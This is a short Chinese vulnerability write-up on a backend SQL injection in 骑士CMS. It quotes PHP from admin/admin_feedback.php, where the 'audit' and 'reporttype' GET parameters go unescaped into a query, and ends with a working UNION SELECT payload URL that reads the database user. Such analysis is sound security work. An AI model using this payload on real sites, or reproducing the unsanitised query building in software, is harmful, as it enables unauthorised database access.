骑士CMS后台SQL注入

摘要

漏洞文件：admin/admin_feedback.php代码82行： 跟下get_report_list:  $_GET['reporttype']

漏洞文件：admin/admin_feedback.php

代码82行：

         if (!empty($_GET['reporttype']))           {                     $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype'];           }           if (!empty($_GET['audit']))           {                     $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit'];           }           $total_val=$db->get_total($total_sql);           $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET));           $currenpage=$page->nowindex;           $offset=($currenpage-1)*$perpage;           $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type);           $smarty->assign('pageheader',"举报信息");           $smarty->assign('list',$list);           $smarty->assign('page',$page->show(3));

 

跟下get_report_list:

 

function get_report_list($offset,$perpage,$get_sql= '',$type)  {      global $db;      $limit=" LIMIT ".$offset.','.$perpage;      if($type==1){         $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit);         while($row = $db->fetch_array($result))         {         $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id']));         $row_arr[] = $row;         }      }else{         $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit);         while($row = $db->fetch_array($result))         {         $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id']));         $row_arr[] = $row;          }      }        return $row_arr;  }

 

$_GET['reporttype']

$_GET['audit']

没有’包含。

 

构造payload:

admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23